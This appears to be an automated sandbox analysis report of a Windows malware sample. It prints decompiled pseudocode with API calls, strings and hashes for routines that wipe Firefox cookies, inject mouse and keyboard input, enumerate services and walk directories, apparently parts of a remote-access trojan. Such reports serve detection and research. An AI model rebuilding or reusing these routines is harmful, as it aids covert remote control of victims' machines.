                      									__eflags =  *(_t92 + 1) & 0x000000ff;
                      									if(( *(_t92 + 1) & 0x000000ff) == 0) {
                      										goto L16;
                      									} else {
                      										goto L8;
                      									}
                      								}
                      							}
                      							goto L19;
                      							L16:
                      							__eflags = FindNextFileA(_t110,  &_v444);
                      						} while (__eflags != 0);
                      						goto L17;
                      					}
                      				} else {
                      					FindClose(_t110);
                      					_t102 = _t111 - 0x18;
                      					_push("\n[Firefox Cookies not found]");
                      					L2:
                      					E00742084(0, _t102);
                      					E0074A6EF(0, _t104, _t117);
                      					L18:
                      				}
                      				L19:
                      				E00741FC7();
                      				E00741FC7();
                      				return 1;
                      			}


                      APIs
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0074A2A5
                      • FindClose.KERNEL32(00000000), ref: 0074A2BB
                      • FindNextFileA.KERNEL32(00000000,?), ref: 0074A2E5
                      • DeleteFileA.KERNEL32(00000000,00000000), ref: 0074A38D
                      • GetLastError.KERNEL32 ref: 0074A397
                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 0074A3AB
                      • FindClose.KERNEL32(00000000), ref: 0074A3D1
                      • FindClose.KERNEL32(00000000), ref: 0074A3F2
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                      • API String ID: 532992503-432212279
                      • Opcode ID: 5a05fd3da19c56fe855bd0b8949cf84eaccab81b46d6c24e48e59f94d506561d
                      • Instruction ID: 4d0ea0e60dba13f42668b2b01023b51983a046b586bde0698337d1070f2d27f8
                      • Opcode Fuzzy Hash: 5a05fd3da19c56fe855bd0b8949cf84eaccab81b46d6c24e48e59f94d506561d
                      • Instruction Fuzzy Hash: B1416431945219ABCF14FBB4DC5ADEDB768BF12300F904169F40696092FF6C5A8AC692
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 76%
                      			E00782C8E(void* __ebx, void* __edi, signed int __esi, void* __eflags, char _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				int _v16;
                      				int _v20;
                      				int _v24;
                      				char _v52;
                      				int _v56;
                      				int _v60;
                      				signed int _v100;
                      				char _v272;
                      				intOrPtr _v276;
                      				char _v280;
                      				char _v356;
                      				char _v360;
                      				void* __ebp;
                      				signed int _t65;
                      				signed int _t72;
                      				signed int _t74;
                      				signed int _t78;
                      				signed int _t85;
                      				signed int _t89;
                      				signed int _t91;
                      				long _t93;
                      				signed int* _t96;
                      				signed int _t99;
                      				signed int _t102;
                      				signed int _t106;
                      				void* _t113;
                      				signed int _t116;
                      				void* _t117;
                      				void* _t119;
                      				void* _t120;
                      				void* _t122;
                      				signed int _t124;
                      				intOrPtr _t125;
                      				signed int* _t128;
                      				signed int _t129;
                      				void* _t132;
                      				void* _t134;
                      				signed int _t135;
                      				signed int _t137;
                      				void* _t140;
                      				intOrPtr _t141;
                      				void* _t143;
                      				signed int _t150;
                      				signed int _t151;
                      				signed int _t154;
                      				signed int _t158;
                      				signed int _t161;
                      				intOrPtr* _t166;
                      				signed int _t167;
                      				intOrPtr* _t168;
                      				void* _t169;
                      				intOrPtr _t170;
                      				void* _t171;
                      				signed int _t172;
                      				int _t176;
                      				signed int _t178;
                      				char** _t179;
                      				signed int _t183;
                      				signed int _t184;
                      				void* _t191;
                      				signed int _t192;
                      				void* _t193;
                      				signed int _t194;
                      
                      				_t178 = __esi;
                      				_t171 = __edi;
                      				_t65 = E007828CD();
                      				_v8 = _v8 & 0x00000000;
                      				_t137 = _t65;
                      				_v16 = _v16 & 0x00000000;
                      				_v12 = _t137;
                      				if(E0078292B( &_v8) != 0 || E007828D3( &_v16) != 0) {
                      					L46:
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					E0077698A();
                      					asm("int3");
                      					_t191 = _t193;
                      					_t194 = _t193 - 0x10;
                      					_push(_t137);
                      					_t179 = E007828CD();
                      					_v52 = 0;
                      					_v56 = 0;
                      					_v60 = 0;
                      					_t72 = E0078292B( &_v52);
                      					_t143 = _t178;
                      					__eflags = _t72;
                      					if(_t72 != 0) {
                      						L66:
                      						_push(0);
                      						_push(0);
                      						_push(0);
                      						_push(0);
                      						_push(0);
                      						E0077698A();
                      						asm("int3");
                      						_push(_t191);
                      						_t192 = _t194;
                      						_t74 =  *0x7aa00c; // 0x67a7e35e
                      						_v100 = _t74 ^ _t192;
                      						 *0x7aa344 =  *0x7aa344 | 0xffffffff;
                      						 *0x7aa338 =  *0x7aa338 | 0xffffffff;
                      						_push(0);
                      						_push(_t179);
                      						_push(_t171);
                      						_t139 = "TZ";
                      						_t172 = 0;
                      						 *0x7ab748 = 0;
                      						_t78 = E00779895(__eflags,  &_v360,  &_v356, 0x100, "TZ");
                      						__eflags = _t78;
                      						if(_t78 != 0) {
                      							__eflags = _t78 - 0x22;
                      							if(_t78 == 0x22) {
                      								_t184 = E0077F98C(_t143, _v276);
                      								__eflags = _t184;
                      								if(__eflags != 0) {
                      									_t85 = E00779895(__eflags,  &_v280, _t184, _v276, _t139);
                      									__eflags = _t85;
                      									if(_t85 == 0) {
                      										E007801F5(0);
                      										_t172 = _t184;
                      									} else {
                      										_push(_t184);
                      										goto L72;
                      									}
                      								} else {
                      									_push(0);
                      									L72:
                      									E007801F5();
                      								}
                      							}
                      						} else {
                      							_t172 =  &_v272;
                      						}
                      						asm("sbb esi, esi");
                      						_t183 =  ~(_t172 -  &_v272) & _t172;
                      						__eflags = _t172;
                      						if(_t172 == 0) {
                      							L80:
                      							L47();
                      						} else {
                      							__eflags =  *_t172;
                      							if(__eflags == 0) {
                      								goto L80;
                      							} else {
                      								_push(_t172);
                      								E00782C8E(_t139, _t172, _t183, __eflags);
                      							}
                      						}
                      						E007801F5(_t183);
                      						__eflags = _v16 ^ _t192;
                      						return E0076FD1B(_v16 ^ _t192);
                      					} else {
                      						_t89 = E007828D3( &_v16);
                      						_pop(_t143);
                      						__eflags = _t89;
                      						if(_t89 != 0) {
                      							goto L66;
                      						} else {
                      							_t91 = E007828FF( &_v20);
                      							_pop(_t143);
                      							__eflags = _t91;
                      							if(_t91 != 0) {
                      								goto L66;
                      							} else {
                      								E007801F5( *0x7ab740);
                      								 *0x7ab740 = 0;
                      								 *_t194 = 0x7ab750;
                      								_t93 = GetTimeZoneInformation(??);
                      								__eflags = _t93 - 0xffffffff;
                      								if(_t93 != 0xffffffff) {
                      									_t150 =  *0x7ab750 * 0x3c;
                      									_t167 =  *0x7ab7a4; // 0x0
                      									_push(_t171);
                      									 *0x7ab748 = 1;
                      									_v12 = _t150;
                      									__eflags =  *0x7ab796; // 0x0
                      									if(__eflags != 0) {
                      										_t151 = _t150 + _t167 * 0x3c;
                      										__eflags = _t151;
                      										_v12 = _t151;
                      									}
                      									__eflags =  *0x7ab7ea; // 0x0
                      									if(__eflags == 0) {
                      										L56:
                      										_v16 = 0;
                      										_v20 = 0;
                      									} else {
                      										_t106 =  *0x7ab7f8; // 0x0
                      										__eflags = _t106;
                      										if(_t106 == 0) {
                      											goto L56;
                      										} else {
                      											_v16 = 1;
                      											_v20 = (_t106 - _t167) * 0x3c;
                      										}
                      									}
                      									_t176 = E0077F55B(0, _t167);
                      									_t99 = WideCharToMultiByte(_t176, 0, 0x7ab754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
                      									__eflags = _t99;
                      									if(_t99 == 0) {
                      										L60:
                      										 *( *_t179) = 0;
                      									} else {
                      										__eflags = _v24;
                      										if(_v24 != 0) {
                      											goto L60;
                      										} else {
                      											( *_t179)[0x3f] = 0;
                      										}
                      									}
                      									_t102 = WideCharToMultiByte(_t176, 0, 0x7ab7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
                      									__eflags = _t102;
                      									if(_t102 == 0) {
                      										L64:
                      										 *(_t179[1]) = 0;
                      									} else {
                      										__eflags = _v24;
                      										if(_v24 != 0) {
                      											goto L64;
                      										} else {
                      											_t179[1][0x3f] = 0;
                      										}
                      									}
                      								}
                      								 *(E007828C7()) = _v12;
                      								 *((intOrPtr*)(E007828BB())) = _v16;
                      								_t96 = E007828C1();
                      								 *_t96 = _v20;
                      								return _t96;
                      							}
                      						}
                      					}
                      				} else {
                      					_t168 =  *0x7ab740; // 0x0
                      					_t8 =  &_a4; // 0x78307e
                      					_t178 =  *_t8;
                      					if(_t168 == 0) {
                      						L12:
                      						E007801F5(_t168);
                      						_t154 = _t178;
                      						_t169 = _t154 + 1;
                      						do {
                      							_t113 =  *_t154;
                      							_t154 = _t154 + 1;
                      						} while (_t113 != 0);
                      						 *0x7ab740 = E0077F98C(_t154 - _t169, _t154 - _t169 + 1);
                      						_t116 = E007801F5(0);
                      						_t170 =  *0x7ab740; // 0x0
                      						if(_t170 == 0) {
                      							goto L45;
                      						} else {
                      							_t158 = _t178;
                      							_push(_t171);
                      							_t171 = _t158 + 1;
                      							do {
                      								_t117 =  *_t158;
                      								_t158 = _t158 + 1;
                      							} while (_t117 != 0);
                      							_t159 = _t158 - _t171;
                      							_t119 = E00781916(_t170, _t158 - _t171 + 1, _t178);
                      							_t193 = _t193 + 0xc;
                      							if(_t119 == 0) {
                      								_t171 = 3;
                      								_push(_t171);
                      								_t120 = E0078D309(_t159,  *_t137, 0x40, _t178);
                      								_t193 = _t193 + 0x10;
                      								if(_t120 == 0) {
                      									while( *_t178 != 0) {
                      										_t178 = _t178 + 1;
                      										_t171 = _t171 - 1;
                      										if(_t171 != 0) {
                      											continue;
                      										}
                      										break;
                      									}
                      									_pop(_t171);
                      									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
                      									if(_t137 != 0) {
                      										_t178 = _t178 + 1;
                      									}
                      									_t161 = E00776769(_t159, _t178) * 0xe10;
                      									_v8 = _t161;
                      									while(1) {
                      										_t122 =  *_t178;
                      										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
                      											break;
                      										}
                      										_t178 = _t178 + 1;
                      									}
                      									__eflags =  *_t178 - 0x3a;
                      									if( *_t178 == 0x3a) {
                      										_t178 = _t178 + 1;
                      										_t161 = _v8 + E00776769(_t161, _t178) * 0x3c;
                      										_v8 = _t161;
                      										while(1) {
                      											_t132 =  *_t178;
                      											__eflags = _t132 - 0x30;
                      											if(_t132 < 0x30) {
                      												break;
                      											}
                      											__eflags = _t132 - 0x39;
                      											if(_t132 <= 0x39) {
                      												_t178 = _t178 + 1;
                      												__eflags = _t178;
                      												continue;
                      											}
                      											break;
                      										}
                      										__eflags =  *_t178 - 0x3a;
                      										if( *_t178 == 0x3a) {
                      											_t178 = _t178 + 1;
                      											_t161 = _v8 + E00776769(_t161, _t178);
                      											_v8 = _t161;
                      											while(1) {
                      												_t134 =  *_t178;
                      												__eflags = _t134 - 0x30;
                      												if(_t134 < 0x30) {
                      													goto L38;
                      												}
                      												__eflags = _t134 - 0x39;
                      												if(_t134 <= 0x39) {
                      													_t178 = _t178 + 1;
                      													__eflags = _t178;
                      													continue;
                      												}
                      												goto L38;
                      											}
                      										}
                      									}
                      									L38:
                      									__eflags = _t137;
                      									if(_t137 != 0) {
                      										_v8 = _t161;
                      									}
                      									__eflags =  *_t178;
                      									_t124 = 0 |  *_t178 != 0x00000000;
                      									_v16 = _t124;
                      									__eflags = _t124;
                      									_t27 =  &_v12; // 0x78307e
                      									_t125 =  *_t27;
                      									if(_t124 == 0) {
                      										 *((char*)( *((intOrPtr*)(_t125 + 4)))) = 0;
                      										L44:
                      										 *(E007828C7()) = _v8;
                      										_t128 = E007828BB();
                      										 *_t128 = _v16;
                      										return _t128;
                      									}
                      									_push(3);
                      									_t129 = E0078D309(_t161,  *((intOrPtr*)(_t125 + 4)), 0x40, _t178);
                      									_t193 = _t193 + 0x10;
                      									__eflags = _t129;
                      									if(_t129 == 0) {
                      										goto L44;
                      									}
                      								}
                      							}
                      							goto L46;
                      						}
                      					} else {
                      						_t166 = _t168;
                      						_t135 = _t178;
                      						while(1) {
                      							_t140 =  *_t135;
                      							if(_t140 !=  *_t166) {
                      								break;
                      							}
                      							if(_t140 == 0) {
                      								L8:
                      								_t116 = 0;
                      							} else {
                      								_t141 =  *((intOrPtr*)(_t135 + 1));
                      								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
                      									break;
                      								} else {
                      									_t135 = _t135 + 2;
                      									_t166 = _t166 + 2;
                      									if(_t141 != 0) {
                      										continue;
                      									} else {
                      										goto L8;
                      									}
                      								}
                      							}
                      							L10:
                      							if(_t116 == 0) {
                      								L45:
                      								return _t116;
                      							} else {
                      								_t11 =  &_v12; // 0x78307e
                      								_t137 =  *_t11;
                      								goto L12;
                      							}
                      							goto L82;
                      						}
                      						asm("sbb eax, eax");
                      						_t116 = _t135 | 0x00000001;
                      						__eflags = _t116;
                      						goto L10;
                      					}
                      				}
                      				L82:
                      			}

                      APIs
                      • _free.LIBCMT ref: 00782D10
                      • _free.LIBCMT ref: 00782D34
                      • _free.LIBCMT ref: 00782EBB
                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0079913C), ref: 00782ECD
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,007AB754,000000FF,00000000,0000003F,00000000,?,?), ref: 00782F45
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,007AB7A8,000000FF,?,0000003F,00000000,?), ref: 00782F72
                      • _free.LIBCMT ref: 00783087
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                      • String ID: ~0x$~0x
                      • API String ID: 314583886-474245733
                      • Opcode ID: b5f3aa1c106a8dc3ceb1e83052827fb444bbc8b913be80ffe75c71212066610b
                      • Instruction ID: 61fd4029b9e30a5c518dde74fe2c5148a8e738bdeb397e2dd14abcaa07899a37
                      • Opcode Fuzzy Hash: b5f3aa1c106a8dc3ceb1e83052827fb444bbc8b913be80ffe75c71212066610b
                      • Instruction Fuzzy Hash: BDC12C71A80205EFDB20BF78CC49AA9BBB9EF42311F1441AAE55497293E73C8E43C754
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 86%
                      			E00754F84(signed int __edx, void* __eflags, char _a8) {
                      				void* _v28;
                      				char _v32;
                      				void* _v36;
                      				void* _v40;
                      				char _v44;
                      				char _v48;
                      				intOrPtr* _t60;
                      				intOrPtr* _t65;
                      				intOrPtr* _t67;
                      				intOrPtr* _t72;
                      				intOrPtr* _t74;
                      				char* _t79;
                      				char* _t80;
                      				char* _t81;
                      				intOrPtr* _t82;
                      				intOrPtr* _t85;
                      				intOrPtr _t90;
                      				signed int _t101;
                      				signed int _t109;
                      				signed int _t118;
                      				signed int _t136;
                      
                      				_t136 = __edx;
                      				_t90 =  *((intOrPtr*)(E00745220(0)));
                      				E007442A6( &_a8,  &_v32, 1, 0xffffffff);
                      				if(_t90 != 0x30) {
                      					__eflags = _t90 - 0x31;
                      					if(_t90 != 0x31) {
                      						__eflags = _t90 - 0x32;
                      						if(_t90 != 0x32) {
                      							__eflags = _t90 - 0x33;
                      							if(_t90 != 0x33) {
                      								__eflags = _t90 - 0x34;
                      								if(_t90 != 0x34) {
                      									__eflags = _t90 - 0x35;
                      									if(_t90 != 0x35) {
                      										__eflags = _t90 - 0x36;
                      										if(_t90 == 0x36) {
                      											_push(0);
                      											_push(0x78);
                      											goto L15;
                      										}
                      									} else {
                      										_push(0);
                      										_push(0xffffff88);
                      										L15:
                      										mouse_event(0x800, 0, 0, ??, ??);
                      									}
                      								} else {
                      									_v40 =  *((intOrPtr*)(E00745220(0)));
                      									_t60 = E00745220(4);
                      									_t101 =  *0x7abd74; // 0x0
                      									_v40 =  *_t60;
                      									E00754E1E( *((intOrPtr*)(0x7abd78 + _t101 * 4)),  &_v44, __eflags,  &_v40);
                      									E00755250(_v44, _v40);
                      								}
                      							} else {
                      								_t65 = E00745220(0);
                      								_v44 =  *((intOrPtr*)(E00745220(4)));
                      								_t67 = E00745220(8);
                      								_t109 =  *0x7abd74; // 0x0
                      								_v44 =  *_t67;
                      								E00754E1E( *((intOrPtr*)(0x7abd78 + _t109 * 4)),  &_v48, __eflags,  &_v44);
                      								E007551F4( *_t65, _v48, _v44);
                      								goto L8;
                      							}
                      						} else {
                      							_t72 = E00745220(0);
                      							_v40 =  *((intOrPtr*)(E00745220(4)));
                      							_t74 = E00745220(8);
                      							_t118 =  *0x7abd74; // 0x0
                      							_v48 =  *_t74;
                      							E00754E1E( *((intOrPtr*)(0x7abd78 + _t118 * 4)),  &_v44, __eflags,  &_v48);
                      							E00755198( *_t72, _v44, _v48);
                      							goto L8;
                      						}
                      					} else {
                      						_t79 = E00745220(4);
                      						_t80 = E00745220(3);
                      						_t81 = E00745220(2);
                      						_t82 = E00745220(0);
                      						 *_t79 =  *_t80;
                      						__eflags =  *_t81;
                      						E00755288( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
                      						goto L8;
                      					}
                      				} else {
                      					E00745220(0);
                      					_t85 = E00745220(1);
                      					E0075459C( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E00745220(2)));
                      					L8:
                      				}
                      				E00741FC7();
                      				return E00741FC7();
			}

                      Instruction addresses for the listing above, one per line of the function body (0x00000000 where a line, such as a goto, has no address of its own):
                      0x00754f84 0x00754fa2 0x00754fa9 0x00754fb1 0x00754ff0 0x00754ff3 0x0075504f 0x00755052
                      0x007550af 0x007550b2 0x00755110 0x00755113 0x00755161 0x00755164 0x0075516b 0x0075516e
                      0x00755170 0x00755171 0x00000000 0x00755171 0x00755166 0x00755166 0x00755167 0x00755173
                      0x0075517a 0x0075517a 0x00755115 0x00755127 0x0075512b 0x00755130 0x00755143 0x0075514c
                      0x0075515a 0x0075515a 0x007550b4 0x007550b9 0x007550cf 0x007550d7 0x007550dc 0x007550ef
                      0x007550f8 0x00755108 0x00000000 0x00755108 0x00755054 0x00755059 0x0075506f 0x00755077
                      0x0075507c 0x0075508f 0x00755098 0x007550a8 0x00000000 0x007550a8 0x00754ff5 0x00754ffb
                      0x00755008 0x00755015 0x00755022 0x0075502d 0x00755037 0x00755044 0x00000000 0x00755049
                      0x00754fb3 0x00754fb8 0x00754fc5 0x00754fe6 0x0075510d 0x0075510d 0x00755184 0x00755197

                      APIs
                      • StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 00754FD8
                      • mouse_event.USER32 ref: 0075517A
                        • Part of subcall function 00754E1E: GetSystemMetrics.USER32 ref: 00754E53
                        • Part of subcall function 00754E1E: GetSystemMetrics.USER32 ref: 00754E68
                        • Part of subcall function 00755250: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 0075527C
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: MetricsSystem$InputSendmouse_event
                      • String ID: 0$1$2$3$4$5$6
                      • API String ID: 1731092567-2737206560
                      • Opcode ID: 9278daa1e3fe5b086163229d588732a7c3837f5a5d98256635f1b14f40f7d047
                      • Instruction ID: 29c8619c04306e43af452b080a7e14c8f15b71db9e875941255aa7014b163207
                      • Opcode Fuzzy Hash: 9278daa1e3fe5b086163229d588732a7c3837f5a5d98256635f1b14f40f7d047
                      • Instruction Fuzzy Hash: B151B1B4604B05DFD704EF20E866BDA77A4EF85310F40490EF952572D2DBB8AA4DCB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E007560DB(intOrPtr __ecx) {
                      				int _v8;
                      				int _v12;
                      				int _v16;
                      				int _v20;
                      				struct _QUERY_SERVICE_CONFIG* _v24;
                      				void* _v28;
                      				intOrPtr _v32;
                      				short** _v36;
                      				intOrPtr _v40;
                      				char _v64;
                      				char _v88;
                      				char _v112;
                      				char _v136;
                      				struct _ENUM_SERVICE_STATUS _v172;
                      				void* __ebx;
                      				void* __edi;
                      				struct _ENUM_SERVICE_STATUS* _t87;
                      				void* _t100;
                      				void* _t107;
                      				int _t108;
                      				long _t110;
                      				void* _t133;
                      				intOrPtr _t198;
                      				short** _t199;
                      				int _t201;
                      				intOrPtr _t202;
                      				int _t203;
                      
                      				_t198 = __ecx;
                      				_v40 = __ecx;
                      				_t133 = OpenSCManagerA(0, 0, 4);
                      				if(_t133 != 0) {
                      					E00741F6D(_t133,  &_v88);
                      					_v12 = 0;
                      					_v8 = 0;
                      					_v20 = 0;
                      					__eflags = EnumServicesStatusW(_t133, 0x3b, 3,  &_v172, 0,  &_v12,  &_v8,  &_v20);
                      					if(__eflags != 0) {
                      						L12:
                      						CloseServiceHandle(_t133);
                      						E0074331A(_t133, _t198, __eflags,  &_v88);
                      						E00741EF0();
                      						L13:
                      						return _t198;
                      					}
                      					__eflags = GetLastError() - 0xea;
                      					if(__eflags != 0) {
                      						goto L12;
                      					}
                      					_t201 = _v12;
                      					_push(_t201);
                      					_t87 = E007794F6( &_v88);
                      					_v36 = _t87;
                      					EnumServicesStatusW(_t133, 0x3b, 3, _t87, _t201,  &_v12,  &_v8,  &_v20);
                      					_t202 = 0;
                      					_v32 = 0;
                      					__eflags = _v8;
                      					if(__eflags <= 0) {
                      						L11:
                      						L007794F1(_v36);
                      						goto L12;
                      					}
                      					_t199 = _v36;
                      					do {
                      						E00743311(E00744405(_t133,  &_v112, _t199[1], __eflags, E0074427F(_t133,  &_v64, 0x7a59c4)));
                      						E00741EF0();
                      						E00741EF0();
                      						E00743311(E00744405(_t133,  &_v64,  *_t199, __eflags, E0074427F(_t133,  &_v112, 0x7a59c4)));
                      						E00741EF0();
                      						E00741EF0();
                      						_t100 = E0074427F(_t133,  &_v136, 0x7a59c4);
                      						E00743311(E00743030( &_v64, E0075729F(_t133,  &_v112, _t199[3]), _t100));
                      						E00741EF0();
                      						E00741EF0();
                      						E00741EF0();
                      						_v16 = _v16 & 0x00000000;
                      						_t107 = OpenServiceW(_t133,  *_t199, 1);
                      						_v28 = _t107;
                      						_t108 = QueryServiceConfigW(_t107, _v24, 0,  &_v16);
                      						__eflags = _t108;
                      						if(_t108 == 0) {
                      							_t110 = GetLastError();
                      							__eflags = _t110 - 0x7a;
                      							if(_t110 == 0x7a) {
                      								_t203 = _v16;
                      								_push(_t203);
                      								_v24 = E007794F6( &_v16);
                      								_t204 = _v24;
                      								QueryServiceConfigW(_v28, _v24, _t203,  &_v16);
                      								E00743311(E007430A6(_t133,  &_v136, E0075729F(_t133,  &_v64,  *_v24), _t199, __eflags, 0x7a59c4));
                      								E00741EF0();
                      								E00741EF0();
                      								E00743311(E007430A6(_t133,  &_v136, E0075729F(_t133,  &_v64,  *((intOrPtr*)(_t204 + 4))), _t199, __eflags, 0x7a59c4));
                      								E00741EF0();
                      								E00741EF0();
                      								E00743311(E007430A6(_t133,  &_v136, E00744405(_t133,  &_v64,  *((intOrPtr*)(_t204 + 0xc)), __eflags, E0074427F(_t133,  &_v112, 0x7a59c4)), _t199, __eflags, "\n"));
                      								E00741EF0();
                      								E00741EF0();
                      								E00741EF0();
                      								L007794F1(_t204);
                      								_t202 = _v32;
                      							}
                      						}
                      						CloseServiceHandle(_v28);
                      						_t202 = _t202 + 1;
                      						_t199 =  &(_t199[9]);
                      						_v32 = _t202;
                      						__eflags = _t202 - _v8;
                      					} while (__eflags < 0);
                      					_t198 = _v40;
                      					goto L11;
                      				}
                      				E0074427F(_t133, _t198, 0x79f724);
                      				goto L13;
			}

                      Instruction addresses for the listing above, one per line of the function body (0x00000000 where a line, such as a goto, has no address of its own):
                      0x007560eb 0x007560ef 0x007560f8 0x007560fc 0x00756112 0x0075611a 0x00756121 0x00756128
                      0x0075613f 0x00756141 0x0075638a 0x0075638b 0x00756397 0x0075639f 0x007563a4 0x007563ac
                      0x007563ac 0x0075614d 0x00756152 0x00000000 0x00000000 0x00756158 0x0075615b 0x0075615c
                      0x00756165 0x00756178 0x0075617e 0x00756180 0x00756183 0x00756186 0x00756381 0x00756384
                      0x00000000 0x00756389 0x0075618c 0x0075618f 0x007561ad 0x007561b5 0x007561bd 0x007561df
                      0x007561e7 0x007561ef 0x007561ff 0x0075621f 0x00756227 0x0075622f 0x0075623a 0x0075623f
                      0x00756248 0x00756251 0x0075625b 0x00756261 0x00756263 0x00756269 0x0075626f 0x00756272
                      0x00756278 0x0075627b 0x00756282 0x0075628a 0x00756291 0x007562b8 0x007562c3 0x007562cb
                      0x007562f2 0x007562fd 0x00756305 0x0075633b 0x00756346 0x0075634e 0x00756356 0x0075635c
                      0x00756361 0x00756364 0x00756272 0x00756368 0x0075636e 0x0075636f 0x00756372 0x00756375
                      0x00756375 0x0075637e 0x00000000 0x0075637e 0x00756105 0x00000000

                      APIs
                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,007ABACC,007AC998), ref: 007560F2
                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,00755BDC,?), ref: 00756139
                      • GetLastError.KERNEL32(?,007ABACC,007AC998), ref: 00756147
                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,00755BDC,?), ref: 00756178
                      • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,007A59C4,00000000,007A59C4,00000000,007A59C4,?,007ABACC,007AC998), ref: 00756248
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                      • String ID:
                      • API String ID: 2247270020-0
                      • Opcode ID: ffe32d0bb88d52ab442ce2f5b6cb22362feaa29d32c7a6cb9364e5299e74a4ae
                      • Instruction ID: 6482323be495bba5e23619f795ebbd0853c6db40048a649e65cef2ac57bb00ef
                      • Opcode Fuzzy Hash: ffe32d0bb88d52ab442ce2f5b6cb22362feaa29d32c7a6cb9364e5299e74a4ae
                      • Instruction Fuzzy Hash: 4A812671D00119EBCF18FBA0DC9AAEEB73AEF14311F508119F91667191EF786A49CB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00757754(WCHAR* __ecx) {
                      				char _v5;
                      				WCHAR* _v12;
                      				short _v532;
                      				short _v1052;
                      				struct _WIN32_FIND_DATAW _v1644;
                      				signed int _t52;
                      				intOrPtr _t53;
                      				char _t54;
                      				short _t55;
                      				signed int _t56;
                      				intOrPtr _t57;
                      				char _t58;
                      				signed int _t63;
                      				char _t68;
                      				void _t72;
                      				void _t73;
                      				signed int _t78;
                      				signed int _t84;
                      				void* _t86;
                      				intOrPtr* _t89;
                      				signed short* _t90;
                      				void* _t91;
                      				signed int _t95;
                      				void* _t100;
                      				void* _t102;
                      				signed short* _t103;
                      				void* _t106;
                      				void* _t107;
                      				signed int _t108;
                      				intOrPtr* _t110;
                      				void* _t112;
                      				void* _t118;
                      				void* _t120;
                      				void* _t123;
                      				void* _t124;
                      
                      				_v12 = __ecx;
                      				_t103 = __ecx;
                      				_t118 =  &_v1052 - __ecx;
                      				do {
                      					_t52 =  *_t103 & 0x0000ffff;
                      					 *(_t118 + _t103) = _t52;
                      					_t103 =  &(_t103[1]);
                      				} while (_t52 != 0);
                      				_t89 =  &_v1052 - 2;
                      				do {
                      					_t53 =  *((intOrPtr*)(_t89 + 2));
                      					_t89 = _t89 + 2;
                      				} while (_t53 != 0);
                      				_t54 = L"\\*"; // 0x2a005c
                      				 *_t89 = _t54;
                      				_t106 =  &_v532 - __ecx;
                      				_t55 =  *0x7a5918; // 0x0
                      				 *((short*)(_t89 + 4)) = _t55;
                      				_t90 = __ecx;
                      				do {
                      					_t56 =  *_t90 & 0x0000ffff;
                      					 *(_t106 + _t90) = _t56;
                      					_t90 =  &(_t90[1]);
                      				} while (_t56 != 0);
                      				_t110 =  &_v532 - 2;
                      				do {
                      					_t57 =  *((intOrPtr*)(_t110 + 2));
                      					_t110 = _t110 + 2;
                      				} while (_t57 != 0);
                      				_t58 = "\\"; // 0x5c
                      				 *_t110 = _t58;
                      				_t86 = FindFirstFileW( &_v1052,  &_v1644);
                      				if(_t86 == 0xffffffff) {
                      					L34:
                      					return 0;
                      				}
                      				_t91 = 0;
                      				do {
                      					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
                      					_t91 = _t91 + 2;
                      					 *(_t123 + _t91 - 0x41a) = _t63;
                      				} while (_t63 != 0);
                      				_v5 = 1;
                      				do {
                      					if(FindNextFileW(_t86,  &_v1644) == 0) {
                      						if(GetLastError() != 0x12) {
                      							L33:
                      							FindClose(_t86);
                      							goto L34;
                      						}
                      						_t68 = 0;
                      						_v5 = 0;
                      						goto L23;
                      					}
                      					if(E007576DE( &(_v1644.cFileName)) != 0) {
